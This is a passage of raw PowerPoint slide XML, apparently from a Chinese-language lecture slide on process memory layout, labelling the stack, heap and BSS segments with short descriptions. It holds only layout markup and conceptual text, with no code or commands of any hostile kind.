          <p:cNvPr id="317462" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1119188" y="3305175"/>
            <a:ext cx="1219200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 111069"/>
              <a:gd name="adj2" fmla="val 47657"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>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zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>进程内存布局</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1511300"/>
            <a:ext cx="7283450" cy="4510088"/>
            <a:chOff x="-3" y="-3"/>
            <a:chExt cx="3455" cy="2406"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 5"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3449" cy="2400"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="3449" cy="2400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 6"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="294" cy="480"/>
                <a:chOff x="0" y="0"/>
                <a:chExt cx="294" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316423" name="Rectangle 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="43" y="0"/>
                  <a:ext cx="208" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Wingdings" pitchFamily="2" charset="2"/>
                      <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    </a:rPr>
                    <a:t>:</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                      <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>   </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316424" name="Rectangle 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="0" y="0"/>
                  <a:ext cx="294"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5" name="Group 9"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="0"/>
                <a:ext cx="465" cy="480"/>
                <a:chOff x="294" y="0"/>
                <a:chExt cx="465" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316426" name="Rectangle 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="337" y="0"/>
                  <a:ext cx="379" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>堆栈</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316427" name="Rectangle 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="0"/>
                  <a:ext cx="465"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6" name="Group 12"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="759" y="0"/>
                <a:ext cx="2690" cy="480"/>
                <a:chOff x="759" y="0"/>
                <a:chExt cx="2690" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316429" name="Rectangle 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="802" y="0"/>
                  <a:ext cx="2604" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>保存调用程序的地址信息，所需要的变量，其它帧指针等</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316430" name="Rectangle 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="759" y="0"/>
                  <a:ext cx="2690"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7" name="Group 15"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="480"/>
                <a:ext cx="294" cy="480"/>
                <a:chOff x="0" y="480"/>
                <a:chExt cx="294" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316432" name="Rectangle 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="43" y="480"/>
                  <a:ext cx="208" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Wingdings" pitchFamily="2" charset="2"/>
                      <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    </a:rPr>
                    <a:t>:</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                      <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>   </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316433" name="Rectangle 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="0" y="480"/>
                  <a:ext cx="294"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8" name="Group 18"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="480"/>
                <a:ext cx="465" cy="480"/>
                <a:chOff x="294" y="480"/>
                <a:chExt cx="465" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316435" name="Rectangle 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="337" y="480"/>
                  <a:ext cx="379" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>HEAP</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316436" name="Rectangle 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="480"/>
                  <a:ext cx="465"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9" name="Group 21"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="759" y="480"/>
                <a:ext cx="2690" cy="480"/>
                <a:chOff x="759" y="480"/>
                <a:chExt cx="2690" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316438" name="Rectangle 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="802" y="480"/>
                  <a:ext cx="2604" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>动态内存分配，本地变量</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316439" name="Rectangle 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="759" y="480"/>
                  <a:ext cx="2690"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0" name="Group 24"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="960"/>
                <a:ext cx="294" cy="480"/>
                <a:chOff x="0" y="960"/>
                <a:chExt cx="294" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316441" name="Rectangle 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="43" y="960"/>
                  <a:ext cx="208" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Wingdings" pitchFamily="2" charset="2"/>
                      <a:ea typeface="新宋体" pitchFamily="49" charset="-122"/>
                    </a:rPr>
                    <a:t>:</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                      <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>   </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                      <a:latin typeface="Times New Roman"/>
                      <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316442" name="Rectangle 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="0" y="960"/>
                  <a:ext cx="294"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1" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="960"/>
                <a:ext cx="465" cy="480"/>
                <a:chOff x="294" y="960"/>
                <a:chExt cx="465" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316444" name="Rectangle 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="337" y="960"/>
                  <a:ext cx="379" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>BSS</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000">
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316445" name="Rectangle 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="294" y="960"/>
                  <a:ext cx="465"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2" name="Group 30"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="759" y="960"/>
                <a:ext cx="2690" cy="480"/>
                <a:chOff x="759" y="960"/>
                <a:chExt cx="2690" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316447" name="Rectangle 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="802" y="960"/>
                  <a:ext cx="2604" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just"/>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>符号块起始地址 ：未初始化全局数据段</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>,</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>即：</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                      <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                    </a:rPr>
                    <a:t>int foo; float baz;</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316448" name="Rectangle 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="759" y="960"/>
                  <a:ext cx="2690"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3" name="Group 33"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="1440"/>
                <a:ext cx="294" cy="480"/>
                <a:chOff x="0" y="1440"/>
                <a:chExt cx="294" cy="480"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="316450" name="Rectangle 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="43" y="1440"/>
                  <a:ext cx="208" cy="480"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="28575">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="just">
                    <a:tabLst>
                      <a:tab pos="228600" algn="l"/>
                    </a:tabLst>
                  </a:pPr>
